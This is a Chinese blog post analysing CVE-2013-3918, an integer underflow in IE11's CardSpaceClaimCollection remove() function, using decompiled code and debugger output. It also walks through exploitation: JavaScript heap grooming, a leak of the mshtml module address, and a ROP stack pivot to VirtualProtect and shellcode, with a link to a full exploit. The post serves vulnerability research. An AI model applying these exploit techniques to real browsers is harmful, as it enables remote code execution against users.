CVE-2013-3918 IE11 CardSpaceClaimCollection ActiveX Integer Underflow漏洞分析及利用 发表于 2017-02-25 | 分类于 漏洞利用 | 暂无评论 # 1. 漏洞分析 首先WinDbg附加IE进程访问POC页面 ```html ``` 访问后造成Crash,这是由于访问了不可访问的内存 ![image_1b9o1mfmul5q1q4i1c2c1m497ba9.png-18.2kB][1] 根据栈回溯可以知道是在`CCardSpaceClaimCollection::remove`函数中触发的异常 ![image_1b9o1resa19nl16rneahuam1og0m.png-25.7kB][2] [1]: http://static.zybuluo.com/birdg0/0205ln6niau5e57lcaca9zfl/image_1b9o1mfmul5q1q4i1c2c1m497ba9.png [2]: http://static.zybuluo.com/birdg0/c5merweql1is6iuxjxutvnyi/image_1b9o1resa19nl16rneahuam1og0m.png [3]: https://github.com/exp-sky/XKungFoo-2013/blob/master/IE%200day%20Analysis%20And%20Exploit.pdf [4]: http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/ [5]: http://static.zybuluo.com/birdg0/auejwjk8q3huyeph69utojob/image_1b9pqottn1k1l1gjf1dhd10d01o6m9.png [6]: http://static.zybuluo.com/birdg0/iu3at4dg8whad1d4qlwz606e/image_1b9ps0o9m12heeprc761o0253713.png [7]: http://static.zybuluo.com/birdg0/h5jo6a1pvgga89sr9q1fm8ua/image_1b9ps9tcd17c0163kqfs15os1bdt1g.png [8]: http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/ [9]: https://github.com/birdg0/exp/blob/master/browser/ie11-cve-2013-3918-exp.html [10]: https://github.com/exp-sky/XKungFoo-2013/blob/master/IE%200day%20Analysis%20And%20Exploit.pdf [11]: http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/ 接下来用IDA分析`icardie.dll`中的`CCardSpaceClaimCollection::remove`函数 ```c signed int __stdcall CCardSpaceClaimCollection::remove(CCardSpaceClaimCollection *this, struct tagVARIANT *var_index) { signed int v2; // edi@1 int v3; // eax@3 CCardSpaceClaimCollection *this_object; // ebx@5 tagSAFEARRAY *v5; // eax@7 unsigned __int32 index; // esi@10 int v8; // eax@18 int this_object_size; // edx@23 const struct _GUID *v10; // [sp+0h] [bp-18h]@0 const struct _GUID *v11; // [sp+4h] [bp-14h]@0 SAFEARRAYBOUND rgsabound; // [sp+Ch] [bp-Ch]@5 char *ppvData; // [sp+14h] [bp-4h]@1 SAFEARRAY *psa; // [sp+20h] [bp+8h]@7 ... if ( var_index->vt != VT_I4 ) { ... } index = var_index->cyVal.Lo; if ( index > this_object->size ) { LABEL_11: v2 = -2147467259; goto LABEL_12; } LABEL_23: SysFreeString(*&ppvData[4 * index]); this_object_size = this_object->size; if ( index != this_object_size - 1 ) memcpy(&ppvData[4 * index], &ppvData[4 * index + 4], 4 * (this_object_size - index)); *&ppvData[4 * --this_object->size] = 0; LABEL_12: if ( ppvData ) SafeArrayUnaccessData(psa); if ( v2 < 0 ) return ReportHR(&IID_ICardSpaceClaimCollection, v10, v11); return v2; } ``` 可以看到当调用`remove`函数时的参数为整数时,`index`的值就是传进来的索引值,重点看**28**行之后的代码,当将要删除的索引值不等于当前的集合大小减1时,就会执行`memcpy`,并把集合大小减1,当POC中的第二个`remove`执行后,集合的大小变成了`-1`即`0xffffffff`,这时再执行`remove(0)`,就会执行`memcpy(&ppvData[0], &ppvData[4], 4 * 0xffffffff)`,这样就导致了非法内存访问。 # 2. 漏洞利用 利用方式exp-sky大牛在[https://github.com/exp-sky/XKungFoo-2013/blob/master/IE%200day%20Analysis%20And%20Exploit.pdf][3]这个pdf中已经讲得很清楚了,使用的exp是[http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/][4] ```html add_item(rc_obj0,"A",20); add_item(rc_obj1,"B",20); add_item(rc_obj2,"C",20); var mysvg = document.getElementById("svg_my"); var filter = document.createElementNS("http://www.w3.org/2000/svg","filter"); mysvg.appendChild(filter); add_item(rc_obj3,"D",20); add_item(rc_obj4,"E",20); add_item(rc_obj5,"F",20); rc_obj5.remove(0); rc_obj5.remove(-88); rc_obj5.remove(-88); for(var i=0; i< 20;i++) rc_obj5.remove(-110); ``` 这一步如果堆布局成功,那么`rc_obj2`的第一个元素指向的就是`filter`元素的`vftable` ``` 0:007> ln 718a7208 (718a7208) MSHTML!CSVGFilterElement::`vftable' | (718a5930) MSHTML!CSVGFilterElement::s_apHdlDescs Exact matches: MSHTML!CSVGFilterElement::`vftable' = 0:007> ? poi(718a7208) - mshtml Evaluate expression: 6584541 = 006478dd ``` 因此取`rc_obj2`第一个元素的值再减去`0x006478dd`就可以泄漏出`mshtml`模块的基地址 ``` var function_addr = rc_obj2.item(0).charCodeAt(1)*65536+rc_obj2.item(0).charCodeAt(0); var mshtml_addr = function_addr-0x006478dd; ``` 这里选用`svg filter`是因为它的大小刚好为`0x50` ![image_1b9pqottn1k1l1gjf1dhd10d01o6m9.png-26.6kB][5] 之后构造ROP,在执行完 ```html add_item(rc_obj3, payload ,20); rc_obj5.remove(-108); rc_obj5.remove(-108); for(var i=0;i<20;i++) rc_obj5.remove(-132); ``` 这一步之后会把`filter`的`vftable`覆盖成`ROP + Shellcode String`的地址,并且`eax`为`String`地址,在之后执行`filter.appendChild(table)`时就会从这行`payload += getDwordStr(mshtml_addr+0x00028cc4); //xchg eax,esp#retn`的gadget开始执行,另外在调用虚表函数指针时会有虚表保护,检测`vtguard`通过后再进行调用,这个位置是在`vftable+0x48` ![image_1b9ps0o9m12heeprc761o0253713.png-163.1kB][6] 最后就是ROP执行`VirtualProtect`把栈设为可执行再执行shellcode ![image_1b9ps9tcd17c0163kqfs15os1bdt1g.png-70.7kB][7] # 3. 完整EXP IE版本为`11.0.9600.16428`,只是修改了[http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/][8]一处地方 ```html ``` 完整EXP下载地址:[https://github.com/birdg0/exp/blob/master/browser/ie11-cve-2013-3918-exp.html][9] # 4. 参考 1. [https://github.com/exp-sky/XKungFoo-2013/blob/master/IE%200day%20Analysis%20And%20Exploit.pdf][10] 2. [http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/][11]